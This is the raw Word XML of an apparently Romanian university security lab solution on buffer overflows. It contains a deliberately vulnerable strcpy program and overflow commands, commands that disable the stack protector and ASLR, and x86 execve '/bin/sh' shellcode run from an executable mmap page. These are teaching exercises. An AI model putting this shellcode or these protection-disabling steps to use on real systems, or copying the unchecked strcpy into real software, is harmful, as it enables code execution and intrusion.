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9FA4" w14:textId="2BFA43B6" w:rsidR="007D6B9B" w:rsidRDefault="007D6B9B" w:rsidP="007D6B9B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Laborator </w:t>
      </w:r>
      <w:r w:rsidR="00D3289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Rezolvare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446556DB" w14:textId="4FAF9E41" w:rsidR="007D6B9B" w:rsidRDefault="007D6B9B" w:rsidP="007D6B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57125C" w14:textId="77777777" w:rsidR="00052E10" w:rsidRDefault="00052E10" w:rsidP="007D6B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CBF160" w14:textId="7FE9E2EB" w:rsidR="00095D8A" w:rsidRDefault="00E06721" w:rsidP="00D3289B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E06721">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ex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A15EB" w:rsidRPr="009A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Let’s take a look at the following vulnerable code</w:t>
      </w:r>
      <w:r w:rsidR="009A15EB" w:rsidRPr="009A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31578DDA" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Vulnerable Code - Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E9A430" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4C7D8F" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D79B2AA" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C7E3D3" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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F7BD4BD" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="009A15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func(</w:t>
      </w:r>
      <w:r w:rsidRPr="009A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="009A15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*string)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9D549D" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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A15EB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4AC3F1E9" w14:textId="29DEB56A" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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A15E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A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="009A15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buffer[</w:t>
      </w:r>
      <w:r w:rsidR="00545080">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="009A15EB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5A24608B" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>strcpy(buffer, string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409899B9" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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A15EB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394E3742" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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8AAABC8" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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A15EB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9A15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</w:t>
      </w:r>
      <w:r w:rsidRPr="009A15EB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9A15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argc, </w:t>
      </w:r>
      <w:r w:rsidRPr="009A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="009A15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*argv[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168CD21A" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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A15EB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3364FCFF" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>func(argv[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444A9C67" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A1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A15EB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A15E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A15E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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5EE61E" w14:textId="77777777" w:rsidR="009A15EB" w:rsidRPr="009A15EB" w:rsidRDefault="009A15EB" w:rsidP="009A15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A15EB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259AA065" w14:textId="7FC4151D" w:rsidR="00196A2D" w:rsidRDefault="00196A2D" w:rsidP="00D32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 face acest program? → </w:t>
      </w:r>
      <w:r w:rsidR="00D956D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Parametrul pe care îl transmitem noi programului prin </w:t>
      </w:r>
      <w:r w:rsidR="00D956D2" w:rsidRPr="00FD4508">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:r w:rsidR="00D956D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> va fi copiat în </w:t>
      </w:r>
      <w:r w:rsidR="00D956D2" w:rsidRPr="00FD4508">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>buffer[32]</w:t>
      </w:r>
      <w:r w:rsidR="00D956D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00545080">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dacă acel parametru depășește cei 32 de biți alocați, vom </w:t>
      </w:r>
      <w:r w:rsidR="00FD4508">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">avea </w:t>
      </w:r>
      <w:r w:rsidR="00FD4508" w:rsidRPr="00FD4508">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>buffer overflow</w:t>
      </w:r>
      <w:r w:rsidR="00FD4508">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B48FE1" w14:textId="206B0953" w:rsidR="00D3289B" w:rsidRPr="00FD4508" w:rsidRDefault="001D2617" w:rsidP="00D3289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Comandă: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD45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apt-get install libc6-dev-i386 gcc-multilib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45517E82" w14:textId="48CEB1C3" w:rsidR="00FD4508" w:rsidRPr="00FD4508" w:rsidRDefault="00FD4508" w:rsidP="00D3289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D4508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   gcc -g -m32 -o ex</w:t>
      </w:r>
      <w:r w:rsidR="00FA02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FD45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Ex</w:t>
      </w:r>
      <w:r w:rsidR="00DD44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FD45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.c &amp;&amp; ./ex</w:t>
      </w:r>
      <w:r w:rsidR="00DD44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FD45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$(python2 -c 'print (32*"A")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C85267" w14:textId="6D51A965" w:rsidR="00FD4508" w:rsidRPr="00FD4508" w:rsidRDefault="00FD4508" w:rsidP="00D3289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D4508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   ./ex</w:t>
      </w:r>
      <w:r w:rsidR="00DD44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FD45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$(python2 -c 'print (33*"A")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7507181E" w14:textId="08216A36" w:rsidR="00095D8A" w:rsidRDefault="009B5AB1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obținem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F44B86" w14:textId="6274A6C3" w:rsidR="00B40B5B" w:rsidRDefault="00B40B5B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B40B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2E736A" wp14:editId="54E99C81">
            <wp:extent cx="5760720" cy="1407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FE08" w14:textId="1FD001BD" w:rsidR="00B40B5B" w:rsidRDefault="00B40B5B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B40B5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stack Smashing is actually caused due to a protection mechanism used by gcc to detect buffer overflow errors.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B40B5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Sursă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09DF73EC" w14:textId="0E1314F7" w:rsidR="00BD48E9" w:rsidRDefault="00BD48E9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Comandă: </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1B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-g -m32 -fno-stack-protector -o ex1 Ex1.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D17F9F0" w14:textId="5CB53489" w:rsidR="005C1BE5" w:rsidRPr="00B40B5B" w:rsidRDefault="005C1BE5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FD45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./ex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 w:rsidRPr="00FD450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$(python2 -c 'print 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100</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD45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*"A")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D71045" w14:textId="77777777" w:rsidR="004B3893" w:rsidRDefault="004B3893" w:rsidP="00225F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612A8" w14:textId="77777777" w:rsidR="004B3893" w:rsidRDefault="004B3893" w:rsidP="00225F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71B130" w14:textId="5623DB6F" w:rsidR="009B5AB1" w:rsidRDefault="00D85F17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Ce obținem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA184A0" w14:textId="1F9F0F10" w:rsidR="00F20844" w:rsidRDefault="00F20844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 w:rsidRPr="00F208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11A697" wp14:editId="66E0E7B4">
            <wp:extent cx="576072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BEA7" w14:textId="6F59D845" w:rsidR="00315F0D" w:rsidRDefault="00F20844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Acum obținem altă eroare: încercăm să accesăm o locație ilegală de memorie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ABA1CA" w14:textId="682325F8" w:rsidR="00D85F17" w:rsidRDefault="004B3893" w:rsidP="0022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Comenzi:</w:t>
      </w:r>
      <w:r w:rsidR="00A32CCF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A32CCF" w:rsidRPr="00315F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echo 0 | sudo tee /proc/sys/kernel/randomize_va_space</w:t>
      </w:r>
      <w:r w:rsidR="00315F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  → dezactivează ASLR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277488F1" w14:textId="3ECF60C5" w:rsidR="00D347A9" w:rsidRDefault="00D347A9" w:rsidP="00225F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C033B8" w14:textId="2FAED900" w:rsidR="004E2664" w:rsidRDefault="004E2664" w:rsidP="00225F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C7AD0A" w14:textId="444642E2" w:rsidR="004E2664" w:rsidRDefault="004E2664" w:rsidP="00225F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80A14E" w14:textId="77777777" w:rsidR="004E2664" w:rsidRDefault="004E2664" w:rsidP="00225F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BC57A" w14:textId="50E99DB6" w:rsidR="00D347A9" w:rsidRPr="00D347A9" w:rsidRDefault="00D347A9" w:rsidP="00D347A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347A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ex 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347A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Now write a program which writes this code in a pointer mapped in an executable page of the virtual memory, and lets call it </w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Declare a pointer to a function which return an </w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and has no parameters and lets call it </w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>fct</w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Assign to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>fct</w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the address of the pointer where you copied the shell code and run </w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>fct</w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – you should obtain a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6461F85A" w14:textId="2D543492" w:rsidR="00D347A9" w:rsidRDefault="00D347A9" w:rsidP="00D347A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Hint – to obtain a pointer to a memory zone with execution rights use mmap.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6883A0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47A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Getting a shell using machine code </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338E68DE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47A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#include&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7959DB05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47A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#include&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07344EDF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47A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#include&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC284D2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47A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#include&lt;sys/mman.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6E54E3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CBB782F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47A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Machine code for shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFE763E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47A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w: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buffer[] = </w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</w:t>
      </w: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30B1A30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3BF89255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47A9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14:paraId="4A129A20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46AF8FE5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347A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w: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*p = mmap(NULL, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w: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>(buffer), PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58302EF7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347A9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>(p == MAP_FAILED) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B868D5A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ab/>
        <w:t>perror(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"mmap"</w:t>
      </w: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3E98473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347A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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308ADF95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AB02C9F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memcpy(p, buffer, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w: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>(buffer));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ACB344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ab/>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9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>(*)())p)();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036619F0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EFDC4AE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347A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//unreachable code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686F45C3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munmap(p, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D347A9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w: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>(buffer));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4421A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D347A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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF8A760" w14:textId="77777777" w:rsidR="00D347A9" w:rsidRPr="00D347A9" w:rsidRDefault="00D347A9" w:rsidP="00D34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47A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4215BE5" w14:textId="77777777" w:rsidR="004E2664" w:rsidRDefault="004E2664" w:rsidP="00D347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360B75" w14:textId="49C3B5C6" w:rsidR="00B50F66" w:rsidRDefault="00B50F66" w:rsidP="00D347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Obținem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07217F6A" w14:textId="15A5EADE" w:rsidR="00B50F66" w:rsidRDefault="004E2664" w:rsidP="00D347A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E26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FF6DE" wp14:editId="31CC5A56">
            <wp:extent cx="5760720" cy="25863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B225" w14:textId="329E78EA" w:rsidR="004B3893" w:rsidRDefault="004B3893" w:rsidP="00D347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6E9B6A" w14:textId="78DA697D" w:rsidR="00B21DAD" w:rsidRDefault="00B21DAD" w:rsidP="00D347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DCD34" w14:textId="77777777" w:rsidR="00B063A6" w:rsidRDefault="00B063A6" w:rsidP="00D347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6ACEB" w14:textId="7AF951CC" w:rsidR="008D6771" w:rsidRPr="009D3FBA" w:rsidRDefault="002A1622" w:rsidP="008D6771">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B21DAD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ex 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D6771">
        <w:rPr>
